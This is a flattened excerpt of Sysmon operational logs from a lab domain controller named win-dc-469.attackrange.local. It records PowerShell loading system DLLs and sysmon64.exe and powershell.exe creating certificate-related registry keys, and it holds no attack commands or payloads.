CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057347210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.872{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057347209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.872{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057347208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.857{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 12241200x800000000000000057347207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.833{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.833{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x800000000000000057347191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.832{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.831{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.831{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.829{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\3aa672cbe292d5ddf9584d1f7db9d670\Microsoft.Management.Infrastructure.ni.dll10.0.14393.4046csMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.Management.Infrastructure.dllMD5=59875203392777585BF3BEDA3FDE5F58,SHA256=0B34C92AD9369E83E93B027F1C29ACA599E3374355D514B5463DC21A7414C7EEfalse-Unavailable 12241200x800000000000000057347179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.820{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.820{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.724{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 12241200x800000000000000057347144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.819{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.818{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.818{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.818{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.817{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.815{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.815{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.459{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll10.0.14393.4583System.Management.AutomationMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationSystem.Management.Automation.dllMD5=AD8389BA939281CED11F6F269CA54BF8,SHA256=6091BCDB4AE15E026EE5E4C39D32553DE70C502F8735EC5144FBC88990BA2FACfalse-Unavailable 12241200x800000000000000057347126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.815{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 13241300x800000000000000057347125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.811{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.811{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.810{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 